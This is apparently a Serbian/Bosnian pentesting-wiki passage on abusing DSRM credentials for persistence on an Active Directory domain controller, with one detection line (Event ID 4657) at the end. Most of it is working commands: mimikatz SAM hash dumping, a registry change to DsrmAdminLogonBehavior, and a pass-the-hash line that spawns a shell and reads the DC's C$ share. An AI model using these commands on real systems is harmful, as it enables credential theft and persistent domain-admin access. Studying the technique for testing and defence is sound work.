DSRM Credentials

Unutar svakog DC-a postoji lokalni administratorski nalog. Imajući administratorske privilegije na ovom računaru, možete koristiti mimikatz da izvučete hash lokalnog Administratora. Zatim, modifikujte registar da aktivirate ovu lozinku kako biste daljinski pristupili ovom lokalnom Administrator korisniku. Prvo moramo izvući hash lokalnog Administrator korisnika unutar DC-a:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Zatim trebamo provjeriti da li taj nalog funkcioniše, i ako registarski ključ ima vrijednost "0" ili ne postoji, trebate postaviti ga na "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Zatim, koristeći PTH, možete prikazati sadržaj C$ ili čak dobiti shell. Primetite da za kreiranje nove PowerShell sesije sa tim hešom u memoriji (za PTH) "domen" koji se koristi je samo ime DC mašine:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Više informacija o tome možete pronaći na: https://adsecurity.org/?p=1714 i https://adsecurity.org/?p=1785

Otklanjanje

• Događaj ID 4657 - Nadzor kreiranja/izmene HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior